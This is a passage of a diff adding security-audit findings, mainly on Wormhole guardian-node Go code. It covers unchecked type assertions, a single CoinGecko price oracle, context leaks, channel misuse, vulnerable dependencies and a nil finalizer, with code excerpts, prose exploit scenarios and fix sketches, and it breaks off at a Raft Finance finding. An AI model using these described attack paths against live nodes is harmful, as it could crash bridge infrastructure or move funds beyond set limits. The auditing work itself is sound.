        // By continuing, we leave this one in the local map so the price will get reverted below.
        continue
    }
}
Figure 4.1: node/pkg/governor/governor_prices.go#L144–L153
Note that if the access to m is successful, the resulting value is cast to a float64. In this case, the cast’s success is verified. A similar check should be performed for the earlier cast. Exploit Scenario Eve, a malicious insider at CoinGecko, sends invalid data to Wormhole nodes, causing them to crash. Recommendations Short term, in the code in figure 4.1, verify that the cast in yellow is successful by adding a check similar to the one highlighted in green. This will eliminate the possibility of a node crashing because CoinGecko returns invalid data. Long term, consider enabling the forcetypeassert lint in CI. This bug was initially flagged by that lint, and then confirmed by our queryCoinGecko response fuzzer. Enabling the lint could help to expose additional bugs like this one.
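A sketch of the recommended comma-ok form for the outer assertion, mirroring the float64 check that figure 4.1 already performs (fragment in the context of that loop):
// Check the outer assertion the same way the inner one is checked.
m, ok := data.(map[string]interface{})
if !ok {
    gov.logger.Error("cgov: unexpected coin gecko response type, reverting to configured price for this token", zap.String("coinGeckoId", coinGeckoId))
    continue
}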
+5. Governor relies on a single external source of truth for asset prices Severity: Informational Difficulty: High Type: Data Validation Finding ID: TOB-WORMGUWA-5 Target: node/pkg/governor/governor_prices.go Description The governor relies on a single external source (CoinGecko) for asset prices, which could enable an attacker to transfer more than they would otherwise be allowed. The governor fetches an asset’s price from CoinGecko, compares the price to a hard-coded default, and uses whichever is larger (figure 5.1). However, if an asset’s price were to grow much larger than the hard-coded default, the hard-coded default would essentially be meaningless, and CoinGecko would become the sole source of truth for the price of that asset. Such a situation could be problematic, for example, if the asset’s price were volatile and CoinGecko had trouble keeping up with the price changes.
// We should use the max(coinGeckoPrice, configuredPrice) as our price for computing notional value.
func (te tokenEntry) updatePrice() {
    if (te.coinGeckoPrice == nil) || (te.coinGeckoPrice.Cmp(te.cfgPrice) < 0) {
        te.price.Set(te.cfgPrice)
    } else {
        te.price.Set(te.coinGeckoPrice)
    }
}
Figure 5.1: node/pkg/governor/governor_prices.go#L205–L212
Exploit Scenario Eve obtains a large quantity of AliceCoin from a hack. AliceCoin’s price is both highly volatile and much larger than what was hard-coded in the last Wormhole release. CoinGecko has trouble keeping up with the current price of AliceCoin. Eve identifies a point in time when the price that CoinGecko reports is low (but still higher than the hard-coded default). Eve uses the opportunity to move more of her maliciously obtained AliceCoin than Wormhole would allow if CoinGecko had reported the correct price. Recommendations Short term, monitor the price of assets supported by Wormhole. If the price of an asset increases substantially, consider issuing a release that takes into account the new price. This will help to avoid situations where CoinGecko becomes the sole source of truth of the price of an asset. Long term, incorporate additional price oracles besides CoinGecko. This will provide more robust protection than requiring a human to monitor prices and issue point releases. +6. Potential resource leak Severity: Informational Difficulty: High Type: Denial of Service Finding ID: TOB-WORMGUWA-6 Target: node/pkg/watchers/evm/watcher.go Description Calls to some Contexts’ cancel functions are missing along certain code paths involving panics. If an attacker were able to exercise these code paths in rapid succession, they could exhaust system resources and cause a DoS. Within watcher.go, WithTimeout is essentially used in one of two ways, using the pattern shown in either figure 6.1 or 6.2. The pattern of figure 6.1 is problematic because cancel will not be called if a panic occurs in MessageEventsForTransaction. By comparison, cancel will be called if a panic occurs after the defer statement in figure 6.2. Note that if a panic occurred in either figure 6.1 or 6.2, RunWithScissors (figure 6.3) would prevent the program from terminating.
timeout, cancel := context.WithTimeout(ctx, 5*time.Second)
blockNumber, msgs, err := MessageEventsForTransaction(timeout, w.ethConn, w.contract, w.chainID, tx)
cancel()
Figure 6.1: node/pkg/watchers/evm/watcher.go#L395–L397
timeout, cancel := context.WithTimeout(ctx, 15*time.Second)
defer cancel()
Figure 6.2: node/pkg/watchers/evm/watcher.go#L186–L187
// Start a go routine with recovering from any panic by sending an error to a error channel
func RunWithScissors(ctx context.Context, errC chan error, name string, runnable supervisor.Runnable) {
    ScissorsErrors.WithLabelValues("scissors", name).Add(0)
    go func() {
        defer func() {
            if r := recover(); r != nil {
                switch x := r.(type) {
                case error:
                    errC <- fmt.Errorf("%s: %w", name, x)
                default:
                    errC <- fmt.Errorf("%s: %v", name, x)
                }
                ScissorsErrors.WithLabelValues("scissors", name).Inc()
            }
        }()
        err := runnable(ctx)
        if err != nil {
            errC <- err
        }
    }()
}
Figure 6.3: node/pkg/common/scissors.go#L20–L41
Golang’s official Context documentation states: The WithCancel, WithDeadline, and WithTimeout functions take a Context (the parent) and return a derived Context (the child) and a CancelFunc. … Failing to call the CancelFunc leaks the child and its children until the parent is canceled or the timer fires. … In light of the above guidance, it seems prudent to call the cancel function, even along panicking paths. Note that the problem described applies to three locations in watcher.go: one involving a call to MessageEventsForTransaction (figure 6.1), one involving a call to TimeOfBlockByHash, and one involving a call to TransactionReceipt. Exploit Scenario Eve discovers a code path she can call in rapid succession, which induces a panic in the call to MessageEventsForTransaction (figure 6.1). Eve exploits this code path to crash Wormhole nodes. Recommendations Short term, use the defer cancel() pattern (figure 6.2) wherever WithTimeout is used.
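A sketch of applying that pattern to the call in figure 6.1 by moving it into a helper, so the deferred cancel runs even if MessageEventsForTransaction panics (the helper name and return types are assumptions inferred from figure 6.1):
// messageEventsWithTimeout is a hypothetical wrapper: because defer is
// function-scoped, cancel fires when this helper returns or panics.
func (w *Watcher) messageEventsWithTimeout(ctx context.Context, tx ethCommon.Hash) (uint64, []*common.MessagePublication, error) {
    timeout, cancel := context.WithTimeout(ctx, 5*time.Second)
    defer cancel()
    return MessageEventsForTransaction(timeout, w.ethConn, w.contract, w.chainID, tx)
}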
Adopting this pattern will help to prevent DoS conditions. Long term, regard all code involving Contexts with heightened scrutiny. Contexts are frequently a source of resource leaks in Go programs, and deserve elevated attention. References ● Golang Context WithTimeout Example +7. PolygonConnector does not properly use channels Severity: Undetermined Difficulty: Undetermined Type: Timing Finding ID: TOB-WORMGUWA-7 Target: node/pkg/watchers/evm/connectors/polygon.go Description The Polygon connector does not read from the PollSubscription.quit channel, nor does it write to the PollSubscription.unsubDone channel. A caller who calls Unsubscribe on the PollSubscription could hang. A PollSubscription struct contains three channels: err, quit, and unsubDone (figure 7.1). Based on our understanding of the code, the entity that fulfills the subscription writes to the err and unsubDone channels, and reads from the quit channel. Conversely, the entity that consumes the subscription reads from the err and unsubDone channels, and writes to the quit channel.1
type PollSubscription struct {
    errOnce   sync.Once
    err       chan error
    quit      chan error
    unsubDone chan struct{}
}
Figure 7.1: node/pkg/watchers/evm/connectors/common.go#L38–L43
More specifically, the consumer can call PollSubscription.Unsubscribe, which writes ErrUnsubscribed to the quit channel and waits for a message on the unsubDone channel (figure 7.2).
func (sub *PollSubscription) Unsubscribe() {
    sub.errOnce.Do(func() {
        select {
        case sub.quit <- ErrUnsubscribed:
            <-sub.unsubDone
        case <-sub.unsubDone:
        }
        close(sub.err)
    })
}
Figure 7.2: node/pkg/watchers/evm/connectors/common.go#L59–L68
1 If our understanding is correct, we recommend documenting these facts.
However, the Polygon connector does not read from the quit channel, nor does it write to the unsubDone channel (figure 7.3). This is unlike BlockPollConnector (figure 7.4), for example. Thus, if a caller tries to call Unsubscribe on the Polygon connector PollSubscription, the caller may hang.
select {
case <-ctx.Done():
    return nil
case err := <-messageSub.Err():
    sub.err <- err
case checkpoint := <-messageC:
    if err := c.processCheckpoint(ctx, sink, checkpoint); err != nil {
        sub.err <- fmt.Errorf("failed to process checkpoint: %w", err)
    }
}
Figure 7.3: node/pkg/watchers/evm/connectors/polygon.go#L120–L129
select {
case <-ctx.Done():
    blockSub.Unsubscribe()
    innerErrSub.Unsubscribe()
    return nil
case <-sub.quit:
    blockSub.Unsubscribe()
    innerErrSub.Unsubscribe()
    sub.unsubDone <- struct{}{}
    return nil
case v := <-innerErrSink:
    sub.err <- fmt.Errorf(v)
}
Figure 7.4: node/pkg/watchers/evm/connectors/poller.go#L180–L192
Exploit Scenario Alice, a Wormhole developer, adds a code path that involves calling Unsubscribe on a Polygon connector’s PollSubscription. By doing so, Alice introduces a deadlock into the code. Recommendations Short term, adjust the code in figure 7.3 so that it reads from the quit channel and writes to the unsubDone channel, similar to how the code in figure 7.4 does. This will eliminate a class of code paths along which hangs or deadlocks could occur. Long term, consider refactoring the code so that the select statements in figures 7.3 and 7.4, as well as a similar statement in LogPollConnector, are consolidated under a single function. The three statements appear similar in their behavior; combining them would make the code more robust against future changes and could help to prevent bugs like this one.
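A sketch of the short-term fix, adding the two missing cases to the select in figure 7.3 (surrounding names as in that figure):
select {
case <-ctx.Done():
    return nil
case <-sub.quit: // sketch: honor Unsubscribe the way poller.go does
    sub.unsubDone <- struct{}{}
    return nil
case err := <-messageSub.Err():
    sub.err <- err
case checkpoint := <-messageC:
    if err := c.processCheckpoint(ctx, sink, checkpoint); err != nil {
        sub.err <- fmt.Errorf("failed to process checkpoint: %w", err)
    }
}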
+8. Receiver closes channel, contradicting Golang guidance Severity: Undetermined Difficulty: Undetermined Type: Timing Finding ID: TOB-WORMGUWA-8 Target: node/pkg/watchers/evm/connectors/common.go Description According to Golang’s official guidance, “Only the sender should close a channel, never the receiver. Sending on a closed channel will cause a panic.” However, along some code paths within the watcher code, the receiver of a channel closes the channel. When PollSubscription.Unsubscribe is called, it closes the err channel (figure 8.1). However, in logpoller.go (figure 8.2), the caller of Unsubscribe (red) is clearly an err channel receiver (green).
func (sub *PollSubscription) Err() <-chan error {
    return sub.err
}

func (sub *PollSubscription) Unsubscribe() {
    sub.errOnce.Do(func() {
        select {
        case sub.quit <- ErrUnsubscribed:
            <-sub.unsubDone
        case <-sub.unsubDone:
        }
        close(sub.err)
    })
}
Figure 8.1: node/pkg/watchers/evm/connectors/common.go#L55–L68
sub, err := l.SubscribeForBlocks(ctx, errC, blockChan)
if err != nil {
    return err
}
defer sub.Unsubscribe()
supervisor.Signal(ctx, supervisor.SignalHealthy)
for {
    select {
    case <-ctx.Done():
        return ctx.Err()
    case err := <-sub.Err():
        return err
    case err := <-errC:
        return err
    case block := <-blockChan:
        if err := l.processBlock(ctx, logger, block); err != nil {
            l.errFeed.Send(err.Error())
        }
    }
}
Figure 8.2: node/pkg/watchers/evm/connectors/logpoller.go#L49–L69
Exploit Scenario Eve discovers a code path along which a sender tries to send to an already closed err channel and panics. RunWithScissors (see TOB-WORMGUWA-6) prevents the node from terminating, but the node is left in an undetermined state. Recommendations Short term, eliminate the call to close in figure 8.1. This will eliminate a class of code paths along which the err channel’s sender(s) could panic. Long term, for each channel, document who the expected senders and receivers are. This will help catch bugs like this one. References ● A Tour of Go: Range and Close +9. Watcher configuration is overly complex Severity: Informational Difficulty: Medium Type: Data Validation Finding ID: TOB-WORMGUWA-9 Target: node/pkg/watchers/evm/watcher.go Description The Run function of the Watcher configures each chain’s connection based on its fields, unsafeDevMode and chainID. This is done in a series of nested if-statements that span over 100 lines, amounting to a cyclomatic complexity of over 90, which far exceeds the commonly accepted threshold for complex code. In order to make the code easier to understand, test, and maintain, it should be refactored. Rather than handling all of the business logic in a monolithic function, the logic for each chain should be isolated within a dedicated helper function. This would make the code easier to follow and reduce the likelihood that an update to one chain’s configuration inadvertently introduces a bug for other chains. if w.chainID == vaa.ChainIDCelo && !w.unsafeDevMode { // When we are running in mainnet or testnet, we need to use the Celo ethereum library rather than go-ethereum. // However, in devnet, we currently run the standard ETH node for Celo, so we need to use the standard go-ethereum.
w.ethConn, err = connectors.NewCeloConnector(timeout, w.networkName, w.url, w.contract, logger) if err != nil { ethConnectionErrors.WithLabelValues(w.networkName, "dial_error").Inc() p2p.DefaultRegistry.AddErrorCount(w.chainID, 1) return fmt.Errorf("dialing eth client failed: %w", err) } } else if useFinalizedBlocks { if w.chainID == vaa.ChainIDEthereum && !w.unsafeDevMode { safeBlocksSupported = true logger.Info("using finalized blocks, will publish safe blocks") } else { logger.Info("using finalized blocks") } [...] /* many more nested branches */ Figure 9.1: node/pkg/watchers/evm/watcher.go#L192–L326 Exploit Scenario Alice, a wormhole developer, introduces a bug that causes guardians to run in unsafe mode in production while adding support for a new evm chain due to the difficulty of modifying and testing the nested code. Recommendations Short term, isolate each chain’s configuration into a helper function and document how the configurations were determined. Long term, run linters in CI to identify code with high cyclomatic complexity and consider whether complex code can be simplified during code reviews. +10. evm.Watcher.Run’s default behavior could hide bugs Severity: Informational Difficulty: High Type: Patching Finding ID: TOB-WORMGUWA-10 Target: node/{cmd/guardiand/node.go, pkg/watchers/evm/watcher.go} Description evm.Watcher.Run tries to create an evm watcher, even if called with a ChainID that does not correspond to an evm chain. Additional checks should be added to evm.Watcher.Run to reject such ChainIDs. Approximately 60 watchers are started in node/cmd/guardiand/node.go (figure 10.1). Fifteen of those starts result in calls to evm.Watcher.Run. Given the substantial number of ChainIDs, one can imagine a bug where a developer tries to create an evm watcher with a ChainID that is not for an evm chain. Such a ChainID would be handled by the blanket else in figure 10.2, which tries to create an evm watcher. Such behavior could allow the bug to go unnoticed. To avoid this possibility, evm.Watcher.Run’s default behavior should be to fail rather than to create a watcher. if shouldStart(ethRPC) { ... ethWatcher = evm.NewEthWatcher(*ethRPC, ethContractAddr, "eth", common.ReadinessEthSyncing, vaa.ChainIDEthereum, chainMsgC[vaa.ChainIDEthereum], setWriteC, chainObsvReqC[vaa.ChainIDEthereum], *unsafeDevMode) ... } if shouldStart(bscRPC) { ... bscWatcher := evm.NewEthWatcher(*bscRPC, bscContractAddr, "bsc", common.ReadinessBSCSyncing, vaa.ChainIDBSC, chainMsgC[vaa.ChainIDBSC], nil, chainObsvReqC[vaa.ChainIDBSC], *unsafeDevMode) ... } if shouldStart(polygonRPC) { ... polygonWatcher := evm.NewEthWatcher(*polygonRPC, polygonContractAddr, "polygon", common.ReadinessPolygonSyncing, vaa.ChainIDPolygon, chainMsgC[vaa.ChainIDPolygon], nil, chainObsvReqC[vaa.ChainIDPolygon], *unsafeDevMode) } ... Figure 10.1: node/cmd/guardiand/node.go#L1065–L1104 ... } else if w.chainID == vaa.ChainIDOptimism && !w.unsafeDevMode { ... } else if w.chainID == vaa.ChainIDPolygon && w.usePolygonCheckpointing() { ... } else { w.ethConn, err = connectors.NewEthereumConnector(timeout, w.networkName, w.url, w.contract, logger) if err != nil { ethConnectionErrors.WithLabelValues(w.networkName, "dial_error").Inc() p2p.DefaultRegistry.AddErrorCount(w.chainID, 1) return fmt.Errorf("dialing eth client failed: %w", err) } } Figure 10.2: node/pkg/watchers/evm/watcher.go#L192–L326 Exploit Scenario Alice, a Wormhole developer, introduces a call to NewEvmWatcher with a ChainID that is not for an evm chain. 
evm.Watcher.Run accepts the invalid ChainID, and the error goes unnoticed. Recommendations Short term, rewrite evm.Watcher.Run so that a new watcher is created only when a ChainID for an evm chain is passed. When a ChainID for some other chain is passed, evm.Watcher.Run should return an error. Adopting such a strategy will help protect against bugs in node/cmd/guardiand/node.go. Long term: ● Add tests to the guardiand package to verify that the right watcher is created for each ChainID. This will help ensure the package’s correctness. ● Consider whether TOB-WORMGUWA-9’s recommendations should also apply to node/cmd/guardiand/node.go. That is, consider whether the watcher configuration should be handled in node/cmd/guardiand/node.go, as opposed to evm.Watcher.Run. The file node/cmd/guardiand/node.go appears to suffer from similar complexity issues. It is possible that a single strategy could address the shortcomings of both pieces of code. +11. Race condition in TestBlockPoller Severity: Informational Difficulty: Medium Type: Timing Finding ID: TOB-WORMGUWA-11 Target: node/pkg/watchers/evm/connectors/poller_test.go Description A race condition causes TestBlockPoller to fail sporadically with the error message in figure 11.1. For a test to be of value, it must be reliable. poller_test.go:300: Error Trace: Error: .../node/pkg/watchers/evm/connectors/poller_test.go:300 Received unexpected error: polling encountered an error: failed to look up latest block: RPC failed Test: TestBlockPoller Figure 11.1: Error produced when TestBlockPoller fails A potential code interleaving causing the above error appears in figure 11.2. The interleaving can be explained as follows: ● The main thread sets the baseConnector’s error and yields (left column). ● The go routine declared at poller_test.go:189 retrieves the error, sets the err variable, loops, retrieves the error a second time, and yields (right column). ● The main thread locks the mutex, verifies that err is set, clears err, and unlocks the mutex (left). ● The go routine sets the err variable a second time (right). ● The main thread locks the mutex and panics because err is set (left). baseConnector.setError(fmt.Errorf("RPC failed")) case thisErr := <-headerSubscription.Err(): mutex.Lock() err = thisErr mutex.Unlock() ... case thisErr := <-headerSubscription.Err(): time.Sleep(10 * time.Millisecond) mutex.Lock() require.Equal(t, 1, pollerStatus) assert.Error(t, err) assert.Nil(t, block) baseConnector.setError(nil) err = nil mutex.Unlock() // Post the next block and verify we get it (so we survived the RPC error). baseConnector.setBlockNumber(0x309a10) time.Sleep(10 * time.Millisecond) mutex.Lock() require.Equal(t, 1, pollerStatus) require.NoError(t, err) mutex.Lock() err = thisErr mutex.Unlock() Figure 11.2: Interleaving of node/pkg/watchers/evm/connectors/poller_test.go#L283–L300 (left) and node/pkg/watchers/evm/connectors/poller_test.go#L198–L201 (right) that causes an error Exploit Scenario Alice, a Wormhole developer, ignores TestBlockPoller failures because she believes the test to be flaky. In reality, the test is flagging a bug in Alice’s code, which she commits to the Wormhole repository. Recommendations Short term: ● Use different synchronization mechanisms in order to eliminate the race condition described above. This will increase TestBlockPoller’s reliability. ● Have the main thread sleep for random rather than fixed intervals. This will help to expose bugs like this one. 
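One possible shape for the first of those recommendations, replacing the sleep-and-mutex handshake with a blocking channel receive (a sketch only; the test wiring is simplified and the channel name is hypothetical):
// Forward subscription errors to the test goroutine through a channel,
// so the assertion blocks until the error actually arrives instead of
// sleeping and inspecting a shared variable.
errSeen := make(chan error, 1)
go func() {
    for thisErr := range headerSubscription.Err() {
        errSeen <- thisErr
    }
}()

baseConnector.setError(fmt.Errorf("RPC failed"))
require.Error(t, <-errSeen) // deterministic: no sleep, no shared err variable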
Long term, investigate automated tools for finding concurrency bugs in Go programs. This bug is not flagged by Go’s race detector. As a result, different analyses are needed. +12. Unconventional test structure Severity: Informational Difficulty: High Type: Testing Finding ID: TOB-WORMGUWA-12 Target: Various source files in node/pkg/watchers Description Tilt is the primary means of testing Wormhole watchers. Relying on such a coarse testing mechanism makes it difficult to know that all necessary conditions and edge cases are tested. The following are some conditions that should be checked by native Go unit tests: ● The right watcher is created for each ChainID (TOB-WORMGUWA-10). ● The evm watchers’ connectors behave correctly (similar to how the evm finalizers’ correct behavior is now tested).2 ● The evm watchers’ logpoller behaves correctly (similar to how the poller’s correct behavior is now tested by poller_test.go). ● There are no off-by-one errors in any inequality involving a block or round number. Examples of such inequalities include the following: ○ node/pkg/watchers/algorand/watcher.go#L225 ○ node/pkg/watchers/algorand/watcher.go#L243 ○ node/pkg/watchers/solana/client.go#L363 ○ node/pkg/watchers/solana/client.go#L841 To be clear, we are not suggesting that the Tilt tests be discarded. However, the Tilt tests should not be the sole means of testing the watchers for any given chain. Exploit Scenario Alice, a Wormhole developer, introduces a bug into the codebase. The bug is not exposed by the Tilt tests. Recommendations Short term, develop unit tests for the watcher code. Get as close to 100% code coverage as possible. Develop specific unit tests for conditions that seem especially problematic. These steps will help ensure the correctness of the watcher code. 2 Note that the evm watchers’ finalizers have nearly 100% code coverage by unit tests. Long term, regularly review test coverage to help identify gaps in the tests as the code evolves. +13. Vulnerable Go packages Severity: Undetermined Difficulty: Undetermined Type: Patching Finding ID: TOB-WORMGUWA-13 Target: node/go.mod Description govulncheck reports that the packages used by Wormhole in table 13.1 have known vulnerabilities, which are described in the following table. Package Vulnerability Description excerpt path/filepath GO-2023-1568 A path traversal vulnerability exists in filepath.Clean on Windows. … mime/multipart GO-2023-1569 A denial of service is possible from excessive resource consumption in net/http and mime/multipart. … crypto/tls GO-2023-1570 Large handshake records may cause panics in crypto/tls. … golang.org/x/net GO-2023-1571 A maliciously crafted HTTP/2 stream could cause excessive CPU consumption in the HPACK decoder, sufficient to cause a denial of service from a small number of small requests. Table 13.1: Vulnerabilities in dependencies reported by govulncheck Exploit Scenario Eve discovers an exploitable code path involving one of the vulnerabilities in table 13.1 and uses it to crash Wormhole nodes. Recommendations Short term, update Wormhole to Go version 1.20.1. This will mitigate all of the vulnerabilities in table 13.1, according to the vulnerability descriptions. Long term, run govulncheck as part of Wormhole’s CI process. This will help to identify vulnerable dependencies as they arise. References ● Vulnerability Management for Go +14. 
Wormhole node does not build with latest Go version Severity: Informational Difficulty: High Type: Patching Finding ID: TOB-WORMGUWA-14 Target: Various source files Description Attempting to build a Wormhole node with the latest Go version (1.20.1) produces the error in figure 14.1. Go’s release policy states, “Each major Go release is supported until there are two newer major releases.” By not building with the latest Go version, Wormhole’s ability to receive updates will expire. cannot use "The version of quic-go you're using can't be built on Go 1.20 yet. For more details, please see https://github.com/lucas-clemente/quic-go/wiki/quic-go-and-Go-versions." (untyped string constant "The version of quic-go you're using can't be built on Go 1.20 yet. F...) as int value in variable declaration Figure 14.1: Error produced when one tries to build the Wormhole with the latest Go version (1.20) It is unclear when Go 1.21 will be released. Go 1.20 was released on February 1, 2023 (a few days prior to the start of the audit), and new versions appear to be released about every six months. We found a thread discussing Go 1.21, but it does not mention dates. Exploit Scenario Alice attempts to build a Wormhole node with Go version 1.20. When her attempt fails, Alice switches to Go version 1.19. Go 1.21 is released, and Go 1.19 ceases to receive updates. A vulnerability is found in a Go 1.19 package, and Alice is left vulnerable. Recommendations Short term, adapt the code so that it builds with Go version 1.20. This will allow Wormhole to receive updates for a greater period of time than if it builds only with Go version 1.19. Long term, test with the latest Go version in CI. This will help identify incompatibilities like this one sooner. References ● Go Release History (see Release Policy) ● Planning Go 1. +15. Missing or wrong context Severity: Low Type: Timing Difficulty: High Finding ID: TOB-WORMGUWA-15 Target: node/pkg/watchers/{algorand, cosmwasm, sui, wormchain}/ watcher.go Description In several places where a Context is required, the Wormhole node creates a new background Context rather than using the passed-in Context. If the passed-in Context is canceled or times out, a go routine using the background Context will not detect this, and resources will be leaked. The aforementioned problem is flagged by the contextcheck lint. For each of the locations named in figure 15.1, a Context is passed in to the enclosing function, but the passed-in Context is not used. Rather, a new background Context is created. algorand/watcher.go:172:51: Non-inherited new context, use function like `context.WithXXX` instead (contextcheck) status, err := algodClient.StatusAfterBlock(0).Do(context.Background()) ^ algorand/watcher.go:196:139: Non-inherited new context, use function like `context.WithXXX` instead (contextcheck) result, err := indexerClient.SearchForTransactions().TXID(base32.StdEncoding.WithPadding(base32.NoP adding).EncodeToString(r.TxHash)).Do(context.Background()) ^ algorand/watcher.go:205:42: Non-inherited new context, use function like `context.WithXXX` instead (contextcheck) block, err := algodClient.Block(r).Do(context.Background()) ^ Figure 15.1: Warnings produced by contextcheck A closely related problem is flagged by the noctx lint. In each of the locations named in figure 15.2, http.Get or http.Post is used. These functions do not take a Context argument. As such, if the Context passed in to the enclosing function is canceled, the Get or Post will not similarly be canceled. 
cosmwasm/watcher.go:198:28: (*net/http.Client).Get must not be called (noctx)
    resp, err := client.Get(fmt.Sprintf("%s/%s", e.urlLCD, e.latestBlockURL))
cosmwasm/watcher.go:246:28: (*net/http.Client).Get must not be called (noctx)
    resp, err := client.Get(fmt.Sprintf("%s/cosmos/tx/v1beta1/txs/%s", e.urlLCD, tx))
sui/watcher.go:315:26: net/http.Post must not be called (noctx)
    resp, err := http.Post(e.suiRPC, "application/json", strings.NewReader(buf))
sui/watcher.go:378:26: net/http.Post must not be called (noctx)
    resp, err := http.Post(e.suiRPC, "application/json", strings.NewReader(`{"jsonrpc":"2.0", "id": 1, "method": "sui_getCommitteeInfo", "params": []}`))
wormchain/watcher.go:136:27: (*net/http.Client).Get must not be called (noctx)
    resp, err := client.Get(fmt.Sprintf("%s/blocks/latest", e.urlLCD))
Figure 15.2: Warnings produced by noctx
Exploit Scenario A bug causes Alice’s Algorand, Cosmwasm, Sui, or Wormchain node to hang. The bug triggers repeatedly. The connections from Alice’s Wormhole node to the respective blockchain nodes hang, causing unnecessary resource consumption. Recommendations Short term, take the following steps:
● For each location named in figure 15.1, use the passed-in Context rather than creating a new background Context.
● For each location named in figure 15.2, rewrite the code to use http.Client.Do.
Taking these steps will help to prevent unnecessary resource consumption and potential denial of service. Long term, enable the contextcheck and noctx lints in CI. The problems highlighted in this finding were uncovered by those lints. Running them regularly could help to identify similar problems. References ● contextcheck ● noctx +16. Use of defer in a loop Severity: Low Difficulty: High Type: Denial of Service Finding ID: TOB-WORMGUWA-16 Target: node/pkg/watchers/solana/client.go Description The Solana watcher uses defer within an infinite loop (figure 16.1). Deferred calls are executed when their enclosing function returns. Since the enclosing loop is not exited under normal circumstances, the deferred calls are never executed and constitute a waste of resources.
for {
    select {
    case <-ctx.Done():
        return nil
    default:
        rCtx, cancel := context.WithTimeout(ctx, time.Second*300) // 5 minute
        defer cancel()
        ...
    }
}
Figure 16.1: node/pkg/watchers/solana/client.go#L244–L271
Sample code demonstrating the problem appears in appendix E. Exploit Scenario Alice runs her Wormhole node in an environment with constrained resources. Alice finds that her node is not able to achieve the same uptime as other Wormhole nodes. The underlying cause is resource exhaustion caused by the Solana watcher. Recommendations Short term, rewrite the code in figure 16.1 to eliminate the use of defer in the for loop. The easiest and most straightforward way would likely be to move the code in the default case into its own named function. Eliminating this use of defer in a loop will eliminate a potential source of resource exhaustion. Long term, regularly review uses of defer to ensure they do not appear in a loop. To the best of our knowledge, there are not publicly available detectors for problems like this. However, regular manual review should be sufficient to spot them.
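A sketch of the recommended restructuring (the helper name is hypothetical); because defer is function-scoped, each iteration now releases its Context when the helper returns:
// pollOnce wraps one loop iteration so its deferred cancel runs at the end
// of every iteration rather than accumulating for the life of the loop.
func (s *SolanaWatcher) pollOnce(ctx context.Context) error {
    rCtx, cancel := context.WithTimeout(ctx, 300*time.Second) // 5 minutes
    defer cancel()
    // ... body of the original default case, using rCtx ...
    _ = rCtx
    return nil
}

for {
    select {
    case <-ctx.Done():
        return nil
    default:
        if err := s.pollOnce(ctx); err != nil {
            return err
        }
    }
}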
+17. Finalizer is allowed to be nil Severity: Informational Difficulty: High Type: Data Validation Finding ID: TOB-WORMGUWA-17 Target: node/pkg/watchers/evm/connectors/poller.go
Description
The configuration of a chain's watcher can allow a finalizer to be nil, which may allow newly introduced bugs to go unnoticed. Whenever a chain's RPC does not have a notion of "safe" or "finalized" blocks, the watcher polls the chain for the latest block using BlockPollConnector. After fetching a block, the watcher checks whether it is "final" in accordance with the respective chain's PollFinalizer implementation.
// BlockPollConnector polls for new blocks instead of subscribing when using SubscribeForBlocks. It allows to specify a
// finalizer which will be used to only return finalized blocks on subscriptions.
type BlockPollConnector struct {
    Connector
    Delay             time.Duration
    useFinalized      bool
    publishSafeBlocks bool
    finalizer         PollFinalizer
    blockFeed         ethEvent.Feed
    errFeed           ethEvent.Feed
}
Figure 17.1: node/pkg/watchers/evm/connectors/poller.go#L24–L34
However, the method pollBlocks allows BlockPollConnector to have a nil PollFinalizer (see figure 17.2). This is unnecessary and may permit edge cases that could otherwise be avoided by requiring all BlockPollConnectors to use the DefaultFinalizer explicitly if a finalizer is not required (the default finalizer accepts all blocks as final). This will ensure that the watcher does not incidentally process a block received from blockFeed that is not in the canonical chain.
if b.finalizer != nil {
    finalized, err := b.finalizer.IsBlockFinalized(timeout, block)
    if err != nil {
        logger.Error("failed to check block finalization", zap.Uint64("block", block.Number.Uint64()), zap.Error(err))
        return lastPublishedBlock, fmt.Errorf("failed to check block finalization (%d): %w", block.Number.Uint64(), err)
    }
    if !finalized {
        break
    }
}
b.blockFeed.Send(block)
lastPublishedBlock = block
Figure 17.2: node/pkg/watchers/evm/connectors/poller.go#L149–L164
Exploit Scenario
A developer adds a new chain to the watcher using BlockPollConnector and forgets to add a PollFinalizer. Because a finalizer is not required to receive the latest blocks, transactions that were not included in the blockchain are considered valid, and funds are incorrectly transferred without corresponding deposits.
Recommendations
Short term, rewrite the block poller to require a finalizer. This makes the configuration of the block poller explicit and clarifies that a DefaultFinalizer is being used, indicating that no extra validations are being performed.
Long term, document the configuration and assumptions of each chain. Then, see if any changes could be made to the code to clarify the developers' intentions.
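A hedged sketch of the recommended guard, requiring an explicit finalizer at construction time; the constructor name is illustrative, and the Connector, PollFinalizer, and BlockPollConnector types are assumed to be those shown in figure 17.1 (imports of errors and time are also assumed):
// NewBlockPollConnector refuses a nil finalizer. Callers that do not need
// extra validation must pass an explicit DefaultFinalizer, which accepts
// every block as final, making that choice visible in the configuration.
func NewBlockPollConnector(connector Connector, finalizer PollFinalizer, delay time.Duration) (*BlockPollConnector, error) {
	if finalizer == nil {
		return nil, errors.New("a PollFinalizer is required; use DefaultFinalizer to accept all blocks")
	}
	return &BlockPollConnector{
		Connector: connector,
		Delay:     delay,
		finalizer: finalizer,
	}, nil
}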
diff --git a/findings_newupdate/tob/2023-04-chainflip-securityreview.txt b/findings_newupdate/tob/2023-04-chainflip-securityreview.txt
new file mode 100644
index 0000000..8d1c8b6
--- /dev/null
+++ b/findings_newupdate/tob/2023-04-chainflip-securityreview.txt
@@ -0,0 +1 @@
+
diff --git a/findings_newupdate/tob/2023-04-tempus-raft-securityreview.txt b/findings_newupdate/tob/2023-04-tempus-raft-securityreview.txt
new file mode 100644
index 0000000..cdafce1
--- /dev/null
+++ b/findings_newupdate/tob/2023-04-tempus-raft-securityreview.txt
@@ -0,0 +1,15 @@
+1. Solidity compiler optimizations can be problematic Severity: Informational Difficulty: High Type: Undefined Behavior Finding ID: TOB-RAFT-1 Target: foundry.toml
Description
The Raft Finance contracts have enabled compiler optimizations. There have been several optimization bugs with security implications. Additionally, optimizations are actively being developed. Solidity compiler optimizations are disabled by default, and it is unclear how many contracts in the wild use them, so how well they are being tested and exercised is unknown. High-severity security issues due to optimization bugs have occurred in the past. For example, a high-severity bug in the emscripten-generated solc-js compiler used by Truffle and Remix persisted until late 2018. The fix for this bug was not reported in the Solidity CHANGELOG. Another high-severity optimization bug resulting in incorrect bit shift results was patched in Solidity v0.5.6. More recently, a bug due to the incorrect caching of Keccak-256 was reported. A compiler audit of Solidity from November 2018 concluded that the optional optimizations may not be safe. It is likely that there are latent bugs related to optimization and that new bugs will be introduced due to future optimizations.
Exploit Scenario
